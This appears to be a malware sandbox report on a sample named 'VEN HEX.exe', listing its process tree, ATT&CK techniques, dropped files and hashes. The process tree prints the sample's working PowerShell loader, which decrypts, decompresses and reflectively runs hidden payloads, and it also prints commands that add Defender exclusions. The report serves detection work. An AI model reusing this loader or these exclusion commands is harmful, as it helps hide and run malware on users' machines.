C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3600

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3692
- C:\Users\Admin\AppData\Local\Temp\VEN HEX.exe
  "C:\Users\Admin\AppData\Local\Temp\VEN HEX.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3140
- - C:\Users\Admin\AppData\Roaming\VEN HEX.exe
    "C:\Users\Admin\AppData\Roaming\VEN HEX.exe"
    3⤵
    - Executes dropped EXE
    PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\svchost.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G0TUrx9xUZl3QiY8FW5D3oMO6sKuLvoqrmbmqWtEWjs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QXo9C/35T8qr7zKptfFYtA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sQcFt=New-Object System.IO.MemoryStream(,$param_var); $jjbkT=New-Object System.IO.MemoryStream; $glekl=New-Object System.IO.Compression.GZipStream($sQcFt, [IO.Compression.CompressionMode]::Decompress); $glekl.CopyTo($jjbkT); $glekl.Dispose(); $sQcFt.Dispose(); $jjbkT.Dispose(); $jjbkT.ToArray();}function execute_function($param_var,$param2_var){ $xFAlG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SuapV=$xFAlG.EntryPoint; $SuapV.Invoke($null, $param2_var);}$rdZJT = 'C:\Users\Admin\AppData\Roaming\svchost.bat';$host.UI.RawUI.WindowTitle = $rdZJT;$saxRT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rdZJT).Split([Environment]::NewLine);foreach ($amLNO in $saxRT) { if ($amLNO.StartsWith('lbPqlxCbQBUdQCerktIl')) { $jKimy=$amLNO.Substring(20); break; }}$payloads_var=[string[]]$jKimy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      4⤵
      PID:232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2420
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1752
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1684
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4848
- C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
  "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\Desktop\ConvertRestore.pptm" /ou ""
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:1684
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:1072
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:1588
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1960 -parentBuildID 20240401114208 -prefsHandle 1876 -prefMapHandle 1868 -prefsLen 26921 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d73eb24-5431-49a6-9a8a-7b01903aa69f} 1588 "\\.\pipe\gecko-crash-server-pipe.1588" gpu
      4⤵
      PID:116
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2348 -parentBuildID 20240401114208 -prefsHandle 2340 -prefMapHandle 2336 -prefsLen 26799 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e8ccef2-1487-42e8-b2c7-9626e33b0adf} 1588 "\\.\pipe\gecko-crash-server-pipe.1588" socket
      4⤵
      PID:2952
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3232 -childID 1 -isForBrowser -prefsHandle 3236 -prefMapHandle 3244 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {540f6305-2331-48e0-92ff-ece9269e2149} 1588 "\\.\pipe\gecko-crash-server-pipe.1588" tab
      4⤵
      PID:5244
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4132 -prefMapHandle 4128 -prefsLen 32173 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2604e71-7ee9-4ef6-8b52-983c638f003e} 1588 "\\.\pipe\gecko-crash-server-pipe.1588" tab
      4⤵
      PID:5476
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4760 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4756 -prefMapHandle 4780 -prefsLen 32542 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {18216c4b-a27a-4465-8a7c-949c683bd867} 1588 "\\.\pipe\gecko-crash-server-pipe.1588" utility
      4⤵
      PID:6400
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 3 -isForBrowser -prefsHandle 5224 -prefMapHandle 5228 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9098767-173f-44fb-b6d2-7fb07affeaa6} 1588 "\\.\pipe\gecko-crash-server-pipe.1588" tab
      4⤵
      PID:6648
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5432 -prefMapHandle 5428 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4023625b-8a9e-4fec-9589-fbaf0c08cfb7} 1588 "\\.\pipe\gecko-crash-server-pipe.1588" tab
      4⤵
      PID:6660
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5260 -childID 5 -isForBrowser -prefsHandle 5552 -prefMapHandle 5556 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1843f4a-06c5-4a48-9556-22754d969459} 1588 "\\.\pipe\gecko-crash-server-pipe.1588" tab
      4⤵
      PID:6676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:3892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:3036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:3668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:1524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
412B

MD5
54e1dce64316d86b3cc964fe75f6b2a4

SHA1
c6a37d1d0f6ade3a746b8edbe6bce9ebee9568ef

SHA256
d006b45a0132890c07ba17050199a4fb2d045cb1577741b691ee329255745628

SHA512
e46ba6b4ed672b9ec617dc7b21481a704207a7d821c0faf6753fab0a1e2c612c77950d07c1b3e46580e0aa78a3210145b8478780746efdbde3b79595f2aca052

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
db2e6a4c4d77ca160045c10d1cba949c

SHA1
6b11997bafeb289cc0afbf0a426bfe031b1e17c7

SHA256
c7a3cf1d821079416de69ad7e472acbb2f6f2d3333d4faec7a6b41ff9e30cefa

SHA512
1d4e737d1c58d51c051fde03223596fae6f587650937c1f4fa42c90afb4a3082910c745fbeb6516bc2c30fd1020a0bc3fe2e2feb93fafe7cb691ac5b32192cb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1fe4a745252c8dbdfc3e0e2bff6bec9a

SHA1
1816cbcf44de7e8b58ea140e3bb5d081ad118a2b

SHA256
75e890efc161cfb7fa59982fa637c939b49b4191a96b1bf1c9bba07ad7727974

SHA512
a05676c6f3a5578a97c386632f223771127d0f2d9da27d433531d20f985e622488d99521b65d5bc946960cf1bf5831787becb4d57937b834155db49c54f620bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bsjtmt0i.5tm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Filesize
771B

MD5
88a4c9752e06d4c057e811ce27669695

SHA1
975967aabb5b8a51558c9ba05dcdfc0922500069

SHA256
fd653227b41d2b982e042827a7e0ef1929e091a09a35157edfd19f963b66c9a2

SHA512
8dd0246e3f2b51db7644f8724af9e1f76b97293844b027c319ce489e85d3132e7aa237a9b501515af3964e1d8b2fbfb58d1da698b6ead50a28637ab676979edc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ajx894gh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
1227049ca0d662ec477a082d5708ce7e

SHA1
cadeab0603049e8fac97b89668d16c6f6e5a302f

SHA256
82296a248a7de798a568e5724c9170622c0f5d7c0e572986de72343fb2c36b6e

SHA512
8ae79ce1cbded4515634386821daa63ddd8239d79364230657170b30fe37b69970bf8c5ff91b9c6b6a79e23c44ab3044c33b7b54b31c272d7bd3659824094042

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ajx894gh.default-release\datareporting\glean\pending_pings\1c9661e2-874e-4dd4-a2f3-7e31351915be

Filesize
671B

MD5
24f9eb1d293921631ecdb21a1c57df9b

SHA1
731d8ace32efcbcfcd341b770da1a2ef3a049556

SHA256
56bc85686496d42d4a1023e6cfb4cfaf05126df8623840ec141cdce0780dfc83

SHA512
6f725147be60fc9c96a693647a24abe15522a823cca5b38c33f7826228c4f332001d1a053621463967426669b75e89a1955c391c07fff17a45f1ad06ed4ebca0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ajx894gh.default-release\datareporting\glean\pending_pings\1cfe99fc-c814-45c5-87be-27a49b61f236

Filesize
982B

MD5
fc48d3744649c6c47d2bc6768fd8172c

SHA1
76033ce5c5b3ff57ae254615d37c6b66fdc46a86

SHA256
d72798f79e7ad31d73909389a1eba035adbb159f8eaf714e21194705cc4eebea

SHA512
feee9fa1a04489075586c461065b33273c4e3bab97457665d89181a539aea92cbfe14b1401ba10873ec8fe98ee715b0ab3d5d7c98c4a1242a27dba7394ffbac6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ajx894gh.default-release\datareporting\glean\pending_pings\a136cfc4-c17d-4a18-aeb0-baad3dcb1b80

Filesize
27KB

MD5
edc043c04160108d3d0802168d15660f

SHA1
0df6ea6556fa9f5a44f1e74ac7c6eeaa473a6dbc

SHA256
748405a87e160eb2d98e2323f38918f827052c7a28172e3bddf71eff7fb4ba1a

SHA512
65dca1cc900a36fa97628f3f60a3edf9f8e328e42776deb9d33a66aa06051d5935715deeeb45b5dfe93d765aa4ae8d132c354150958fc60fc07699d75a028999

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ajx894gh.default-release\prefs-1.js

Filesize
9KB

MD5
9a920d74ee79560f56252d371825cb45

SHA1
75f3fc895cdc362a11bc52c31f7c834e828b8169

SHA256
4e415dfed1d7349403bc0ccf808eaf80dd41e018b4e7f5ef55fb7a1212c687d7

SHA512
00eb5d35ff8085c160dfa708964eb6b4179440c07e64ad7f09f9c6e1a19beaf9ff850da4352ec1a46c1a551d8c909ab7565074daa71e6f43c8a30cab817ed572

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ajx894gh.default-release\prefs.js

Filesize
9KB

MD5
bfdabd82e0875aa02fa693dfba6d771e

SHA1
d1cdf162d805df55da4c4a15aa016fb929f58239

SHA256
de6b7f0df38f82dd8968a559ff5f4ad6fb507c6177d1665bf2b43b4064dd8514

SHA512
aa1805f9737430495be20b8456f4433fcc35fd73d8c5f1369365e76e1daa300156d33eade05bf349a855fd747b45cbd87b5ba1b9df4b47ed32be17d1071689eb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ajx894gh.default-release\sessionstore-backups\recovery.baklz4

Filesize
1KB

MD5
56555c3bd0a54038d1fd6d7552e3a0f4

SHA1
a61b9a35cb773d328086d94ec7e548cfaf251a19

SHA256
6e0ca080daa582628133defbf6f87914d209247dd700f46945fef82b763d0044

SHA512
9e1c44cab4e0d77b5a41984ae3cabd8e3b5fcd74789425ee7dfc8ef501b7b66b3e5d722fb055045b2454a4a6d24a70b75676ff7ad39f2a9f9d0b89857efa8db2

Download Submit
C:\Users\Admin\AppData\Roaming\VEN HEX.exe

Filesize
1.2MB

MD5
4a0ea02b201eab0a908b6db29cf0d092

SHA1
c3cd97a3a92de760d38ca2876d8745bccdbd44db

SHA256
1ee45f00597c628d89bbb96d97b0625ac9d33c60614269f41536f23aab6036fe

SHA512
ca37d6c9ecbb49dc8b576924ca3cd978a6d3b9db3c18dc2baa6894f0527e3ac6ca7ef560e1c717d8aa3fe959520fb3192be1d71f1b5a73c86dfc8c3eeeaa1a98

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.bat

Filesize
413KB

MD5
b5339fcbb69e245c78fcc2ed19e1edc5

SHA1
8446ee0f386cd98df35a5915bedf590b457ee2b2

SHA256
566788014dc9af85aec136acb4509711cc574e9b7c23a6774f6229cf5d71eabc

SHA512
ac28f71aac92bd41f8b3320f5f26cf6212ec4aeb5683f9d2751694c0b95dfae667d8a3b646c36f3a706ef55a72de8bcf1312e8c2e870070797a51869cb70fee8

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
3KB

MD5
39b9eb9d1a56bc1792c844c425bd1dec

SHA1
db5a91082fa14eeb6550cbc994d34ebd95341df9

SHA256
acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692

SHA512
255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
4ac1741ceb19f5a983079b2c5f344f5d

SHA1
f1ebd93fbade2e035cd59e970787b8042cdd0f3b

SHA256
7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc

SHA512
583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
a9124c4c97cba8a07a8204fac1696c8e

SHA1
1f27d80280e03762c7b16781608786f5a98ff434

SHA256
8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

SHA512
537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

Download Submit
memory/740-49-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/776-46-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/916-68-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/936-52-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/968-50-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1296-69-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1320-55-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1352-47-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1480-80-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1496-67-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1672-79-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1688-70-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1744-54-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/1868-78-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/2280-71-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/2708-56-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/2852-81-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/2884-60-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/2892-61-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/2924-34-0x000001BD7AAB0000-0x000001BD7AB00000-memory.dmp

Filesize
320KB

Download
memory/2924-32-0x000001BD7AB30000-0x000001BD7ABA6000-memory.dmp

Filesize
472KB

Download
memory/2924-21-0x000001BD7A620000-0x000001BD7A642000-memory.dmp

Filesize
136KB

Download
memory/2924-82-0x000001BD7AB00000-0x000001BD7AB1C000-memory.dmp

Filesize
112KB

Download
memory/2924-237-0x000001BD7B9D0000-0x000001BD7B9DC000-memory.dmp

Filesize
48KB

Download
memory/2924-31-0x000001BD7AA60000-0x000001BD7AAA4000-memory.dmp

Filesize
272KB

Download
memory/2924-33-0x000001BD7A7F0000-0x000001BD7A7F8000-memory.dmp

Filesize
32KB

Download
memory/3112-51-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/3140-0-0x00007FFDA4173000-0x00007FFDA4175000-memory.dmp

Filesize
8KB

Download
memory/3140-1-0x00000000008A0000-0x0000000000AB4000-memory.dmp

Filesize
2.1MB

Download
memory/3256-77-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/3568-53-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download
memory/3692-35-0x0000000002980000-0x00000000029AA000-memory.dmp

Filesize
168KB

Download
memory/3692-48-0x00007FFD82970000-0x00007FFD82980000-memory.dmp

Filesize
64KB

Download